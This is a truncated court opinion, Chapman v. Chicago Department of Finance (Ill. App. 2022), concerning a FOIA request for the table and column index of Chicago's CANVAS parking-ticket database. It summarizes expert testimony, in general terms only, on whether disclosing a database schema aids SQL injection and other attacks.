Chapman v. Chi. Dep't of Fin.
| Decision Date | 14 February 2022 |
| Docket Number | 1-20-0547 |
| Citation | 2022 IL App (1st) 200547,193 N.E.3d 950,456 Ill.Dec. 710 |
| Parties | Matt CHAPMAN, Plaintiff-Appellee, v. The CHICAGO DEPARTMENT OF FINANCE, Defendant-Appellant. |
| Court | United States Appellate Court of Illinois |
Celia Meza, Acting Corporation Counsel, of Chicago (Benna Ruth Solomon, Myriam Zreczny Kasper, and Elizabeth Mary Tisher, Assistant Corporation Counsel, of counsel), for appellant.
Joshua Burday, Matthew Topic, and Merrick Wayne, of Loevy & Loevy, of Chicago, for appellee.
¶ 1 Following a bench trial, the trial court granted plaintiff Matt Chapman's Freedom of Information Act (FOIA) ( 5 ILCS 140/1 et seq. (West 2018)) request directed at defendant the Chicago Department of Finance (Department), seeking disclosure of an "index of the tables and columns within each table" of the Citation Administration and Adjudication System (CANVAS), a system used to store, process, and track citation information for parking tickets, speed-light camera tickets, stoplight traffic tickets, booting, and towing tickets. On appeal, the Department argues that the requested information was exempt from disclosure because it constituted a "file layout" and its dissemination "would jeopardize" the security of the CANVAS system and database. We affirm.
¶ 3 On August 30, 2018, Chapman submitted the following to the Department:
On September 12, 2018, the Department notified Chapman of its decision to deny his request, stating that the requested records were exempt from disclosure because the "dissemination of [the] pieces of network information could jeopardize the security of the systems of the City of Chicago." On September 17, 2018, Chapman disputed the Department's decision, arguing that "database schemas are specifically releasable through FOIA."1 On October 2, 2018, after consulting with the City of Chicago's (City) law department, the Department reiterated its decision to deny the FOIA request.
¶ 4 On November 1, 2018, Chapman filed a complaint, asserting a "willful violation of the Freedom of Information Act, to respond to [his] Freedom of Information Act requests seeking records regarding database schema information of CANVAS, a system used to store parking ticket information." The parties filed cross-motions for summary judgment. The Department's motion included the affidavit of Bruce Coffing, chief information security officer with the City's department of innovation and technology (DoIT), attesting that the "[r]elease of the requested information, especially in combination with the information already made public about the CANVAS system, would jeopardize the security of not only the CANVAS system and database, but also the data contained therein." Chapman's motion included the affidavit of Thomas Ptacek, an information and software security "vulnerability researcher," attesting that "[w]ith respect to the security of a computer application backed by a database, knowledge of the ‘schema’—the collection of tables and their constituent columns—would, in a competently built system, be of marginal value to the adversary." Following a hearing, the trial court denied the cross-motions for summary judgment, finding a factual issue regarding the meaning of "marginal value" as stated in Ptacek's affidavit. At trial, both Coffing and Ptacek testified.
¶ 5 Coffing has worked in cybersecurity for about 22 years. He testified that the CANVAS system stores "sensitive information," consisting of "first name and last name of the primary vehicle owners and the secondary vehicle owner, driver's license numbers, addresses, whether or not there is handicap parking related to that individual, [and] information about who wrote the tickets." Coffing stated that CANVAS is a "competently built system" that was built based on the best practices in the industry.
¶ 6 Coffing also testified that he is responsible for protecting the CANVAS system from a "cyberattack," which occurs when an unauthorized user of the CANVAS system "is attempting to achieve a goal that is not in alignment for business purposes for that system." To prevent a cyberattack, "a layer of defense" is employed, consisting of "numerous controls that all build upon each other to provide a defense against adversaries." One layer of defense includes "limiting the information that's known about a system, so that the adversary has less to capture in their efforts to perform recognizance about the system." By restricting the information that is available, an attacker would have to be more "noisy," which alerts defenders that an attack is underway. The activity of an "attacker" who has precise information about the target system "may blend in and look like normal activity in the system." Attacks made by people with more knowledge of the system are more precise and effective than attacks made by people who are just conducting recognizance.
¶ 7 Coffing stated that Chapman requested a "file layout" because "table names and column names" are "the information that the database management system uses to create the structure of the database" that stores the data. He explained that using file layouts or source listings, "threat actor[s] would perform recognizance on a target or a system and *** would use this information to more precisely craft their attacks, again to limit the noise that they would make to limit the likelihood of them being detected." He stated that Chapman's request undermines "the layer defense" strategy because, "by addressing the information that's available on the system," more information is available "for a threat actor to perform recognizance again to more precisely tailor their attacks." Coffing acknowledged that Chapman's request did not seek any of the actual data in the field, such as parking ticket, red light camera, or speed camera data.
¶ 8 Coffing next explained "SQL" or "sequel for short," which stands for "structured query language" and "is the language that a database management system uses." A SQL injection is a type of cybersecurity attack. "A threat actor would attempt to use sequel to create a sequel statement, which is an instruction, and it would attempt to inject that into an existing interface that is expecting *** a field that says ‘last name’ " and then "force the system to do something that it was not intended to do" but "something that the threat actor wants the system to do." "[I]f you have more information about the database, the table names, the column names, you know where to look for what you are going after" and "you can precisely write your attack, your SQL Injection, when you are entering into that field." Regarding the CANVAS system specifically, a SQL injection is a threat because it "could allow a threat actor to gain access to the data in the system *** to exfiltrate data to find out information about *** our constituents to use for whatever purposes they have." Information in the system could also be modified, such as changing a ticket from not paid to paid, or from $500 to $1. A threat actor "could do something to delete or otherwise modify the data to make it unusable for the system and, therefore, impairing the City's ability to manage citations."
¶ 9 Coffing also explained that "Zero-day" is another type of an attack and refers "to those vulnerabilities that aren't known except to the attacker *** so, therefore, the defenders don't have the opportunity to defend against them." He opined that "by making public more information about a system, it gives a threat actor more at their disposal to attempt to attack."
¶ 10 On cross-examination, Coffing agreed that the FOIA request was "for the listing of tables in the CANVAS database, what the fields are in those tables, and a general description of the type of data in each field." He explained that "if you precisely know what that field name is, then you can more precisely craft your attack and you are not going to make noise you are going to go undetected or less detected than if you don't have that information." Without the information, an attacker would have "to make some guesses" and "those inaccurate guesses are going to generate errors, they are going to generate logs," which "are the things that defenders look for to try to determine whether or not there is a threat actor in the environment." Coffing stated that "[o]ne of the things that helps us defend that system is not making this information available." He did not "want to make it easier for the bad guys and bad gals out there to attack our system and *** put our constituents’ private data at risk." According to Coffing, someone who knows any of the field names within CANVAS with the proper training could attempt to change data in the system or do any of the other attacks that he described.
¶ 11 Ptacek testified that he has worked in the information and software security field for 25 years. As a "vulnerability researcher," he looks for and helps fix identified vulnerabilities in systems. In other words, he "hacks systems for a living." Ptacek has never worked with the CANVAS system, but his general statements "apply to virtually any application built on these types of technologies."
¶ 12 Ptacek...
To continue reading
Request your trial